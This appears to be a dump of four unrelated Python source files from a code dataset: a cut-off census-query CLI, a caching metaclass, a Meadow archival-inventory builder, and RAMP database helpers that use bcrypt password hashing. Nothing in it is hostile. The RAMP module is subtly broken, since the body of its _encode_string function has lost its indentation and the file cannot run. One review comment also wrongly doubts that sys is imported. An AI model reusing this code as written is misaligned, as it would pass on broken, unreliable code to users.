    Args:
        args: parsed argparse namespace (request, year, export attributes).
    """
    try:
        requestType = args.request
        if requestType == Requests.population:
            query = BDLMultiCityQuery(Variable.Population.total, CITIES_10, lastYears())
        elif requestType == Requests.population_by_age_and_gender:
            # This request is a per-year breakdown, so the year is mandatory.
            # Fix: idiomatic identity check (`is None`) instead of `== None`.
            if args.year is None:
                raise Exception(f"Year parameter is required in request {requestType}")
            query = BDLMultiVariableQuery(FEMALES, Unit.lublin, args.year)
        elif requestType == Requests.births:
            query = BDLMultiCityQuery(Variable.Demographics.births, CITIES_10, lastYears())
        elif requestType == Requests.deaths:
            query = BDLMultiCityQuery(Variable.Demographics.deaths, CITIES_10, lastYears())
        else:
            raise Exception(f"Invalid request {requestType}.\nValid request types are:{requestHelp()}")
        data = query.execute()
        if data:
            logger.info(data)
            if args.export:
                exportToXLSX(data)
        else:
            logger.warning("No data exported")
    except Exception as err:
        # Top-level CLI boundary: report the failure instead of crashing.
        logger.error(f"Error: {err}")
def requestHelp():
    """Return a multi-line listing of the valid request names for --help output."""
    options = [Requests.births, Requests.deaths, Requests.population,
               Requests.population_by_age_and_gender]
    # The leading backspace keeps argparse's help formatting compact.
    return "\b" + "\n".join(f" - {option}" for option in options)
# Script entry point: forward the CLI arguments (minus the program name) to main().
if __name__ == "__main__":
    main(sys.argv[1:])
|
# Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''
Defines the `CachedType` metaclass.
See its documentation for more details.
'''
from python_toolbox.sleek_reffing import SleekCallArgs
class SelfPlaceholder:
    '''Stand-in object used in place of `self` when recording call-args.'''
class CachedType(type):
    '''
    A metaclass for sharing instances.
    For example, if you have a class like this:
    class Grokker(object, metaclass=caching.CachedType):
        def __init__(self, a, b=2):
            self.a = a
            self.b = b
    Then all the following calls would result in just one instance:
    Grokker(1) is Grokker(1, 2) is Grokker(b=2, a=1) is Grokker(1, **{})
    This metaclass understands keyword arguments.
    All the arguments are sleekreffed to prevent memory leaks. Sleekref is a
    variation of weakref. Sleekref is when you try to weakref an object, but if
    it's non-weakreffable, like a `list` or a `dict`, you maintain a normal,
    strong reference to it. (See documentation of
    `python_toolbox.sleek_reffing` for more details.) Thanks to sleekreffing
    you can avoid memory leaks when using weakreffable arguments, but if you
    ever want to use non-weakreffable arguments you are still able to.
    (Assuming you don't mind the memory leaks.)
    '''
    def __new__(mcls, *args, **kwargs):
        # Give every class created through this metaclass its own instance
        # cache. `__cache` is name-mangled to `_CachedType__cache`, so both
        # methods of this metaclass refer to the same attribute.
        result = super().__new__(mcls, *args, **kwargs)
        result.__cache = {}
        return result
    def __call__(cls, *args, **kwargs):
        # Key the cache on the (sleekreffed) call arguments; SelfPlaceholder
        # stands in for the instance, which does not exist yet at lookup time.
        sleek_call_args = SleekCallArgs(
            cls.__cache,
            cls.__init__,
            *((SelfPlaceholder,) + args),
            **kwargs
        )
        try:
            # EAFP: return the already-built instance for these arguments.
            return cls.__cache[sleek_call_args]
        except KeyError:
            # First call with these arguments: build, memoize, then return.
            cls.__cache[sleek_call_args] = value = \
                super().__call__(*args, **kwargs)
            return value
|
#!/usr/bin/env python3
import argparse
import csv
import glob
import os
import posixpath
import sys

import meadow_parser_funcs
# ------------------------------------------------------------------------------
# Command-line interface: required input/output paths plus optional inventory
# loading, skip patterns, description-column selection, and the auxiliary-file
# parsing mode. Parsed once at import time into the module-global `args`.
# ------------------------------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument('--input', '-i', action='store', dest='input_path', type=str, help='full path to input folder')
parser.add_argument('--output', '-o', action='store', dest='output_path', type=str, help='full path to output csv file')
parser.add_argument('--load_inventory', '-l', required=False, nargs='*', action='store', dest='source_inventory', help='Use to specify an object inventory. If not specified the script will look in the base folder of the input for object inventories. If no inventories are found the script will leave some fields blank.')
parser.add_argument('--skip', '-s', required=False, nargs='*', action='store', dest='skip', help='Use to specify patterns to skip. Can take multiple inputs. For example, "_ac." "_am." could be used to skip legacy ac and am files.')
parser.add_argument('--description', '-d', required=False, nargs='*', action='store', dest='desc', help='Use to specify column names to populate Meadow description field with. Can take multiple inputs. Information from each column will be separated by a ";". Example usage: -d "Date/Time" "Barcode". If not specified, script will default to looking for the column "inventory_title"')
#parser.add_argument('--newline_limit', '-n', required=False, nargs=1, action='store', dest='output_path', type=int, help='Limit fields imported into the description field to a certain number of newlines.')
parser.add_argument('--auxiliary', '-x', required=False, nargs=1, action='store', dest='aux_parse', help='Sets how to parse auxiliary files. Options include: extension (by extension), parse (by word), none (no aux files). Default is none.')
args = parser.parse_args()
def input_check(indir):
    '''Abort unless an input path was supplied and is an existing directory.'''
    if not indir:
        print("No input provided")
        quit()
    elif not os.path.isdir(indir):
        print('input is not a directory')
        quit()
def output_check(output):
    '''Abort unless the output path names a CSV file.'''
    if output.endswith('.csv'):
        return
    print("\n--- ERROR: Output must be a CSV file ---\n")
    quit()
def interpret_aux_command():
    '''Abort if any value passed via --auxiliary is not a recognized option.'''
    valid_options = ('extension', 'parse')
    for option in args.aux_parse:
        if option not in valid_options:
            print('\n---ERROR: ' + option + ' is not a valid input to the auxiliary command ---\n')
            quit()
def update_fieldname_list(original_fieldname_list, missing_fieldname_list):
    '''Return the original field names with any reported-missing ones removed.'''
    missing = set(missing_fieldname_list)
    return [header for header in original_fieldname_list if header not in missing]
def missing_description_field_handler(missing_descriptive_fieldnames):
    '''Warn about absent inventory columns and ask whether to continue.'''
    print("+++ WARNING: Your inventory is missing the following columns +++")
    print(missing_descriptive_fieldnames)
    print("SKIP COLUMNS AND CONTINUE? (y/n)")
    negative = {'no', 'n'}
    # Any answer other than an explicit "no"/"n" (including empty or
    # unrecognized input) lets the run continue, matching the y-default prompt.
    if input().lower() in negative:
        quit()
#TODO add early warning if spreadsheet is missing important columns like work_accession_number
def import_inventories(source_inventories):
    '''
    Import CSV inventories and parse each row into a dictionary that is added to a list.
    Lists of dicts are used initially so duplicate filenames can be caught later on.

    Args:
        source_inventories: iterable of paths to CSV inventory files.
    Returns:
        A list of dictionaries, one per inventory row, describing each file.
    '''
    missing_fieldnames = False
    source_inventory_dictlist = []
    for i in source_inventories:
        # Fresh row list per inventory so an invalid path earlier in the loop
        # can never leak a previous file's rows (or NameError) into this one.
        csvDict = []
        if i.endswith('.csv'):
            if os.path.isfile(i):
                with open(i, encoding='utf-8') as f:
                    reader = csv.DictReader(f, delimiter=',')
                    for row in reader:
                        # Work type is assumed by the presence of format-specific column headers.
                        if 'Width (cm.)' in reader.fieldnames:
                            work_type = 'IMAGE'
                        elif 'Speed IPS' in reader.fieldnames:
                            work_type = 'AUDIO'
                        # Fix: the original condition was `'Region' or 'Stock' in
                        # reader.fieldnames`, which is always truthy ('Region' is a
                        # non-empty string), so every non-image/audio inventory was
                        # silently typed VIDEO and the error branch was unreachable.
                        elif 'Region' in reader.fieldnames or 'Stock' in reader.fieldnames:
                            work_type = 'VIDEO'
                        else:
                            work_type = None
                        if work_type == 'AUDIO' or work_type == 'VIDEO':
                            # Default description source column unless overridden via -d.
                            if not args.desc:
                                description_fields = ['inventory_title']
                            else:
                                description_fields = args.desc
                            missing_descriptive_fieldnames = [a for a in description_fields if not a in reader.fieldnames]
                            if missing_descriptive_fieldnames:
                                missing_fieldnames = True
                                description_fields = update_fieldname_list(description_fields, missing_descriptive_fieldnames)
                            description_list = []
                            for header in description_fields:
                                description_list.append(row[header])
                            # Join only non-empty parts so blank cells don't produce "; ;".
                            description = "; ".join(part for part in description_list if part)
                            if not 'label' in reader.fieldnames:
                                inventory_label = None
                            else:
                                inventory_label = row['label']
                            csvData = {
                                'filename' : row['filename'],
                                'work_type' : work_type,
                                'work_accession_number' : row['work_accession_number'],
                                'description' : description,
                                'label' : inventory_label
                            }
                        elif work_type == 'IMAGE':
                            csvData = {
                                'filename' : row['filename'],
                                'label' : row['label'],
                                'work_type' : work_type,
                                'work_accession_number' : row['work_accession_number'],
                                'file_accession_number' : row['file_accession_number'],
                                'role' : row['role'],
                                'description' : row['description']
                            }
                        else:
                            # No recognizable format columns: refuse to guess.
                            print("--- ERROR: Problem identifying work type in " + i + " ---")
                            quit()
                        csvDict.append(csvData)
                if missing_fieldnames == True:
                    missing_description_field_handler(missing_descriptive_fieldnames)
            else:
                print('\n--- ERROR: ' + i + ' is not a file ---\n')
                quit()
        else:
            print('\n--- ERROR: Inventory path is not valid ---\n')
        source_inventory_dictlist.extend(csvDict)
    return source_inventory_dictlist
#sorted[]
'''setting up inputs and outputs'''
# Validate the input folder, then derive the output CSV path: either the one
# given on the command line or "<input>/<basename>-meadow_ingest_inventory.csv".
indir = args.input_path
input_check(indir)
if args.output_path:
    meadow_csv_file = args.output_path
else:
    base_folder_name = os.path.basename(indir)
    meadow_csv_file = os.path.join(indir, base_folder_name + '-meadow_ingest_inventory.csv')
output_check(meadow_csv_file)
if args.aux_parse:
    interpret_aux_command()
'''importing inventories'''
# Prefer explicitly supplied inventories; otherwise scan the input folder for
# CSV files, excluding any previously generated ingest inventory.
if args.source_inventory:
    source_inventories = args.source_inventory
    source_inventory_dictlist = import_inventories(source_inventories)
else:
    print('\n*** Checking input directory for CSV files ***')
    source_inventories = glob.glob(os.path.join(indir, "*.csv"))
    # skip the auto-generated meadow ingest csv if it already exists
    source_inventories = [i for i in source_inventories if not '-meadow_ingest_inventory.csv' in i]
    if not source_inventories:
        # No inventory found: let the user decide whether to proceed with
        # blank inventory-derived fields.
        print("\n+++ WARNING: Unable to find CSV inventory file +++")
        print("CONTINUE? (y/n)")
        yes = {'yes','y', 'ye', ''}
        no = {'no','n'}
        choice = input().lower()
        if choice in yes:
            source_inventory_dictlist = [{}]
        elif choice in no:
            quit()
        else:
            # NOTE(review): uses sys.stdout — confirm `sys` is imported at the
            # top of this script, otherwise this branch raises NameError.
            sys.stdout.write("Please respond with 'yes' or 'no'")
            quit()
    else:
        print("Inventories found\n")
        source_inventory_dictlist = import_inventories(source_inventories)
# check that each csv file actually exists [approach later will be to iterate through loaded dictionaries of CSV files to check if a file corresponds to a key, which is derived from the filename column]
# fallback 1: if a source inventory exists in indir, iterate through loading all csv files
# fallback 2: if no inventory is specified and no csv files are found in indir, warn and proceed with no inventory
'''
setting up parameters for meadow inventory
'''
#TODO may want to convert everything to lowercase so you don't risk running into errors
#TODO move generating this dict to a function in a separate module
# Maps each recognized file category to: how it is identified ('extension' vs
# filename 'pattern'), its Meadow role code, a display label, and the affix
# used when building file accession numbers.
role_dict = {
    'framemd5' : {'identifiers' : ['.framemd5'], 'type' : 'extension', 'role' : 'S', 'label' : 'Framemd5 file', 'file_builder' : '_supplementary_'},
    'metadata' : {'identifiers' : ['.xml', '.json'], 'type' : 'extension', 'role' : 'S', 'label' : 'Metadata file', 'file_builder' : '_supplementary_'},
    'qctools' : {'identifiers' : ['.xml.gz', '.qctools.mkv'], 'type' : 'extension', 'role' : 'S', 'label' : 'QCTools report', 'file_builder' : '_supplementary_'},
    'spectrogram' : {'identifiers' : ['.png', '.PNG'], 'type' : 'extension', 'role' : 'S', 'label' : 'Spectrogram file', 'file_builder' : '_supplementary_'},
    'dpx_checksum' : {'identifiers' : ['dpx.txt'], 'type' : 'extension', 'role' : 'S', 'label' : 'Source DPX sidecar checksum', 'file_builder' : '_supplementary_'},
    'access' : {'identifiers' : ['-a.', '_a.', '-am.', '_am.', '_am_', '-am-', '.mp4'], 'type' : 'pattern', 'role' : 'A', 'label' : None, 'file_builder' : '_access_'},
    'preservation' : {'identifiers' : ['-p.', '_p.', '-pm.', '_pm.', '_pm_', '-pm-', '.mkv'], 'type' : 'pattern', 'role' : 'P', 'label' : None, 'file_builder' : '_preservation_'}
}
# Auxiliary-file handling depends on the --auxiliary mode chosen on the CLI.
if not args.aux_parse:
    aux_dict = {'auxiliary' : {'identifiers' : None, 'type' : None, 'role' : None, 'label' : None, 'file_builder' : None}}
elif 'extension' in args.aux_parse:
    # NOTE(review): the key 'auxiliay' looks like a typo for 'auxiliary'; it is
    # a runtime dict key, so left untouched — confirm nothing looks it up by name.
    aux_dict = {
        'auxiliay' : {'identifiers' : ['.jpg', '.JPG'], 'type' : 'extension', 'role' : 'X', 'label' : 'image', 'file_builder' : '_auxiliary_'}
    }
elif 'parse' in args.aux_parse:
    aux_dict = {'auxiliary' : {'identifiers' : ['_Asset', '-Asset', '_Can', '-Can', 'Front.', 'Back.'], 'type' : 'xparse', 'role' : 'X', 'label' : None, 'file_builder' : '_auxiliary_'}}
role_dict.update(aux_dict)
# add a generic catch-all for unexpected file types
role_dict.update({'other' : {'identifiers' : None, 'type' : None, 'role' : None, 'label' : None, 'file_builder' : None}})
# Column order of the Meadow ingest CSV written at the end of this script.
header_names = ['work_type', 'work_accession_number', 'file_accession_number', 'filename', 'description', 'label', 'role', 'work_image', 'structure']
'''
extract the filenames from the inventories as a list
'''
filename_list = []
for i in source_inventory_dictlist:
    name = i.get('filename')
    filename_list.append(name)
# error out if duplicate filenames are found
if len(filename_list) != len(set(filename_list)):
    print('\n--- ERROR: There are duplicate filenames in your inventories ---\n')
    quit()
# convert the list to a dict keyed by filename so lookups below are direct
source_inventory_dict = {}
for item in source_inventory_dictlist:
    name = item['filename']
    source_inventory_dict[name] = item
#TODO add a check for existing file with filename before overwriting
'''
attempt to create output csv before continuing
'''
# Touch the output file up front so we fail fast (permissions, bad path)
# before doing any of the directory-walking work below.
try:
    with open(meadow_csv_file, 'w', newline='\n') as outfile:
        # Fix: the original called `outfile.close` without parentheses — a
        # no-op attribute access. The `with` block handles closing.
        pass
except OSError:
    print("\n--- ERROR: Unable to create output file", meadow_csv_file + ' ---\n')
    quit()
meadow_inventory = []
meadow_full_dict = {}
# Walk the input tree in sorted order so file accession suffixes are assigned
# deterministically from run to run.
for subdir, dirs, files in os.walk(indir):
    dirs.sort()
    # Path of the current folder relative to the input root.
    clean_subdir = (subdir.replace(indir, ''))
    clean_subdir = clean_subdir.strip('/')
    # skip file types we don't want
    #TODO put this in an external function to make this a little cleaner
    files = [f for f in files if not f[0] == '.']
    files = [f for f in files if not f == 'Thumbs.db']
    files = [f for f in files if not f.endswith('.md5')]
    files = [f for f in files if not f.endswith('.csv')]
    if args.skip:
        skip_list = args.skip
        for i in skip_list:
            files = [f for f in files if not i in f]
    # prune hidden directories from the walk in place
    dirs[:] = [d for d in dirs if not d[0] == '.']
    for file in sorted(files):
        # set filename (relative to the input root)
        filename = os.path.join(clean_subdir, file)
        #filename = filename.replace(os.sep, posixpath.sep)
        # One output row per file; fields are filled in below when the file
        # matches an inventory entry.
        meadow_file_dict = {
            'work_type': None,
            'work_accession_number': None,
            'file_accession_number': None,
            'filename': filename,
            'description': None,
            'label': None,
            'role': None,
            'work_image': None,
            'structure': None
        }
        #TODO add safety check to make sure there aren't multiple matches for a filename in the accession numbers
        # check for a corresponding item in the loaded inventory
        #TODO handle cases where there is no inventory
        for item in filename_list:
            if item in file:
                meadow_file_dict.update({'work_accession_number': source_inventory_dict[item]['work_accession_number']})
                # load the work type
                work_type = source_inventory_dict[item]['work_type']
                meadow_file_dict.update({'work_type': work_type})
                # load the description
                meadow_file_dict.update({'description': source_inventory_dict[item]['description']})
                # if the dictionary does not already have a key corresponding to the item, add it
                if item not in meadow_full_dict:
                    meadow_full_dict[item] = [meadow_file_dict]
                # otherwise append it to the existing key
                else:
                    meadow_full_dict[item].append(meadow_file_dict)
                # setting a generic label
                inventory_label = source_inventory_dict[item]['label']
                if work_type == "VIDEO" or work_type == "AUDIO":
                    label,role,file_builder = meadow_parser_funcs.get_label(role_dict, file, inventory_label)
                    meadow_file_dict.update({'role': role})
                    # Count how many files of this role already exist for the
                    # work so the accession suffix (_001, _002, ...) stays unique.
                    role_count = sum(x.get('role') == role for x in meadow_full_dict.get(item))
                    meadow_file_dict.update({'label': label})
                    meadow_file_dict.update({'file_accession_number' : item + file_builder + f'{role_count:03d}'})
                else:
                    # IMAGE rows carry role/label/accession straight from the inventory.
                    meadow_file_dict.update({'role': source_inventory_dict[item]['role']})
                    meadow_file_dict.update({'label': inventory_label})
                    meadow_file_dict.update({'file_accession_number' : source_inventory_dict[item]['file_accession_number']})
        #TODO build out how to handle cases where a file is not found in the inventory
        # allow the user to add the file anyway
        if not any(item in file for item in filename_list):
            print("+++ WARNING: No entry matching " + file + " was found in your inventory +++")
#TODO final check that all hidden files and folders from the filename list are accounted for in the final inventory
# Write every collected row, grouped by inventory item, to the output CSV.
with open(meadow_csv_file, 'w', newline='', encoding='utf-8') as f:
    writer = csv.DictWriter(f, fieldnames = header_names)
    writer.writeheader()
    for item in meadow_full_dict:
        for file_info in meadow_full_dict[item]:
            writer.writerow(file_info)
print("Process complete!")
print("Meadow inventory located at: " + meadow_csv_file)
|
"""
The :mod:`ramp_database.utils` module provides tools to setup and connect to
the RAMP database.
"""
from contextlib import contextmanager
import bcrypt
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.engine.url import URL
from .model import Model
def setup_db(config):
    """Build a SQLAlchemy engine and session factory for the RAMP database.

    Parameters
    ----------
    config : dict
        Keyword arguments describing the database connection. With the
        standard RAMP configuration this is the ``sqlalchemy`` section.

    Returns
    -------
    db : :class:`sqlalchemy.Engine`
        The engine to connect to the database.
    Session : :class:`sqlalchemy.orm.Session`
        Configured Session class which can later be used to communicate
        with the database.
    """
    # Assemble the connection URL straight from the configuration mapping.
    engine = create_engine(URL.create(**config))
    session_factory = sessionmaker(engine)
    # Materialize every table of the relational model on this database.
    Model.metadata.create_all(engine)
    return engine, session_factory
@contextmanager
def session_scope(config):
    """Connect to a database and provide a session to make some operation.

    Parameters
    ----------
    config : dict
        Configuration dictionary containing the information to connect to
        the database. If you are using the configuration provided by ramp,
        it corresponds to the `sqlalchemy` key.

    Yields
    ------
    session : :class:`sqlalchemy.orm.Session`
        The session to directly perform the operation on the database.
    """
    db, Session = setup_db(config)
    with db.connect() as conn:
        session = Session(bind=conn)
        try:
            yield session
            # Commit only when the caller's block completed without error.
            session.commit()
        except BaseException:
            # Explicit BaseException keeps the original bare-except
            # semantics: roll back on *any* failure (including
            # KeyboardInterrupt/GeneratorExit) before re-raising.
            session.rollback()
            raise
        finally:
            session.close()
def _encode_string(text):
return bytes(text, "utf-8") if isinstance(text, str) else text
def hash_password(password):
    """Hash a password.

    Parameters
    ----------
    password : str or bytes
        Human readable password.

    Returns
    -------
    hashed_password : bytes
        The hashed password (bcrypt output, salt included).
    """
    # A fresh salt is generated for every call, so hashing the same
    # password twice yields different digests.
    salt = bcrypt.gensalt()
    return bcrypt.hashpw(_encode_string(password), salt)
def check_password(password, hashed_password):
    """Check whether a plain password matches a previously hashed one.

    Parameters
    ----------
    password : str or bytes
        Human readable password.
    hashed_password : str or bytes
        The hashed password.

    Returns
    -------
    is_same_password : bool
        True if the two passwords are identical.
    """
    candidate = _encode_string(password)
    reference = _encode_string(hashed_password)
    return bcrypt.checkpw(candidate, reference)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.